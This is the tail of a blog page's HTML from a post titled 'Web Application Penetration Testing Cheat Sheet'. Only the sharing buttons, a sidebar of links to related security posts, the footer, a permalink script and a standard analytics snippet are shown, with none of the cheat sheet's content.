  <!-- Sharingbutton LinkedIn -->
  <a class="resp-sharing-button__link" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/&amp;title=Web%20Application%20Penetration%20Testing%20Cheat%20Sheet" target="_blank" aria-label="LinkedIn">
    <div class="resp-sharing-button resp-sharing-button--linkedin resp-sharing-button--medium">
      <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
          <path d="M6.5 21.5h-5v-13h5v13zM4 6.5C2.5 6.5 1.5 5.3 1.5 4s1-2.4 2.5-2.4c1.6 0 2.5 1 2.6 2.5 0 1.4-1 2.5-2.6 2.5zm11.5 6c-1 0-2 1-2 2v7h-5v-13h5V10s1.6-1.5 4-1.5c3 0 5 2.2 5 6.3v6.7h-5v-7c0-1-1-2-2-2z"></path>
        </svg>
      </div>LinkedIn</div>
  </a>
  
  <!-- Sharingbutton Reddit -->
  <a class="resp-sharing-button__link" href="https://reddit.com/submit/?url=https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/" target="_blank" aria-label="Reddit">
    <div class="resp-sharing-button resp-sharing-button--reddit resp-sharing-button--medium">
      <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
          <path d="M24 11.5c0-1.65-1.35-3-3-3-.96 0-1.86.48-2.42 1.24-1.64-1-3.75-1.64-6.07-1.72.08-1.1.4-3.05 1.52-3.7.72-.4 1.73-.24 3 .5C17.2 6.3 18.46 7.5 20 7.5c1.65 0 3-1.35 3-3s-1.35-3-3-3c-1.38 0-2.54.94-2.88 2.22-1.43-.72-2.64-.8-3.6-.25-1.64.94-1.95 3.47-2 4.55-2.33.08-4.45.7-6.1 1.72C4.86 8.98 3.96 8.5 3 8.5c-1.65 0-3 1.35-3 3 0 1.32.84 2.44 2.05 2.84-.03.22-.05.44-.05.66 0 3.86 4.5 7 10 7s10-3.14 10-7c0-.22-.02-.44-.05-.66 1.2-.4 2.05-1.54 2.05-2.84zM2.3 13.37C1.5 13.07 1 12.35 1 11.5c0-1.1.9-2 2-2 .64 0 1.22.32 1.6.82-1.1.85-1.92 1.9-2.3 3.05zm3.7.13c0-1.1.9-2 2-2s2 .9 2 2-.9 2-2 2-2-.9-2-2zm9.8 4.8c-1.08.63-2.42.96-3.8.96-1.4 0-2.74-.34-3.8-.95-.24-.13-.32-.44-.2-.68.15-.24.46-.32.7-.18 1.83 1.06 4.76 1.06 6.6 0 .23-.13.53-.05.67.2.14.23.06.54-.18.67zm.2-2.8c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zm5.7-2.13c-.38-1.16-1.2-2.2-2.3-3.05.38-.5.97-.82 1.6-.82 1.1 0 2 .9 2 2 0 .84-.53 1.57-1.3 1.87z"></path>
        </svg>
      </div>Reddit</div>
  </a>
  
  <!-- Sharingbutton Hacker News -->
  <a class="resp-sharing-button__link" href="https://news.ycombinator.com/submitlink?u=https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/" target="_blank" aria-label="Hacker News">
    <div class="resp-sharing-button resp-sharing-button--hackernews resp-sharing-button--medium">
      <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 140 140">
          <path fill-rule="evenodd" d="M60.94 82.314L17 0h20.08l25.85 52.093c.397.927.86 1.888 1.39 2.883.53.994.995 2.02 1.393 3.08.265.4.463.764.596 1.095.13.334.262.63.395.898.662 1.325 1.26 2.618 1.79 3.877.53 1.26.993 2.42 1.39 3.48 1.06-2.254 2.22-4.673 3.48-7.258 1.26-2.585 2.552-5.27 3.877-8.052L103.49 0h18.69L77.84 83.308v53.087h-16.9v-54.08z"></path>
        </svg>
      </div>Hacker News</div>
  </a>
</section>
  </div>
</article>

      </div>

      <div class="unit one-fifth hide-on-mobiles">
  <aside>
    <ul>
      <li class="">
        <a href="https://jdow.io/blog/">All Blog Posts</a>
      </li>
      <li class="">
        <a href="https://jdow.io/blog/software-development">Software Development</a>
      </li>
      <li class="">
        <a href="https://jdow.io/blog/information-security">Information Security</a>
      </li>
      <li class="">
        <a href="https://jdow.io/blog/walkthroughs">Walkthroughs</a>
      </li>
      <li class="">
        <a href="https://jdow.io/blog/cheat-sheets">Cheat Sheets</a>
      </li>
    </ul>
    <h4>Software Development</h4>
    <ul>
      
      <li class="">
        <a href="https://jdow.io/blog/2017/11/25/setting-up-a-new-mac-for-software-development/"> Setting Up a New Mac for Software Development</a>
      </li>
      
      <li>
        <a href="https://jdow.io/blog/software-development">More »</a>
      </li>
    </ul>
    <h4>Information Security</h4>
    <ul>
      
      <li class="">
        <a href="https://jdow.io/blog/2018/01/14/owasp-top-10-application-security-risks/"> OWASP Top 10 2017 – Application Security Risks</a>
      </li>
      
      <li>
        <a href="https://jdow.io/blog/information-security">More »</a>
      </li>
    </ul>
    <h4>Walkthroughs</h4>
    <ul>
      
      <li class="">
        <a href="https://jdow.io/blog/2018/02/08/mr-robot-1-vulnhub/"> Mr Robot 1 Walkthough</a>
      </li>
      
      <li class="">
        <a href="https://jdow.io/blog/2017/12/16/overthewire-bandit-wargame-walkthrough/"> OverTheWire Bandit Wargame Walkthrough</a>
      </li>
      
      <li>
        <a href="https://jdow.io/blog/walkthroughs">More »</a>
      </li>
    </ul>
    <h4>Cheat Sheets</h4>
    <ul>
      
      <li class="current">
        <a href="https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/"> Web Application Penetration Testing Cheat Sheet</a>
      </li>
      
      <li>
        <a href="https://jdow.io/blog/cheat-sheets">More »</a>
      </li>
    </ul>
  </aside>
</div>


      <div class="clear"></div>

    </div>
  </section>


  <footer>
  <div class="grid">
    <div class="unit one-third center-on-mobiles">
      <p>JDow.io <br>©&nbsp;2018</p>
    </div>
    <div class="unit two-thirds align-right center-on-mobiles">
      <p>
        Proudly hosted by
        <a href="https://github.com/">
          <img src="web_app_pen_testing_cheat_sheet_files/footer-logo.png" alt="GitHub • Social coding" width="100" height="30">
        </a>
      </p>
    </div>
  </div>
</footer>

  <script>
  var anchorForId = function (id) {
    var anchor = document.createElement("a");
    anchor.className = "header-link";
    anchor.href      = "#" + id;
    anchor.innerHTML = "<span class=\"sr-only\">Permalink</span><i class=\"fa fa-link\"></i>";
    anchor.title = "Permalink";
    return anchor;
  };

  var linkifyAnchors = function (level, containingElement) {
    var headers = containingElement.getElementsByTagName("h" + level);
    for (var h = 0; h < headers.length; h++) {
      var header = headers[h];

      if (typeof header.id !== "undefined" && header.id !== "") {
        header.appendChild(anchorForId(header.id));
      }
    }
  };

  document.onreadystatechange = function () {
    if (this.readyState === "complete") {
      var contentBlock = document.getElementsByClassName("docs")[0] || document.getElementsByClassName("news")[0];
      if (!contentBlock) {
        return;
      }
      for (var level = 1; level <= 6; level++) {
        linkifyAnchors(level, contentBlock);
      }
    }
  };
</script>

  


  <!-- Google Analytics (https://www.google.com/analytics) -->
  <script>
    !function(j,e,k,y,l,L){j.GoogleAnalyticsObject=y,j[y]||(j[y]=function(){
    (j[y].q=j[y].q||[]).push(arguments)}),j[y].l=+new Date,l=e.createElement(k),
    L=e.getElementsByTagName(k)[0],l.src='//www.google-analytics.com/analytics.js',
    L.parentNode.insertBefore(l,L)}(window,document,'script','ga');

    ga('create', 'UA-109895875-2', 'auto');
    ga('send', 'pageview');

  </script>




</body></html>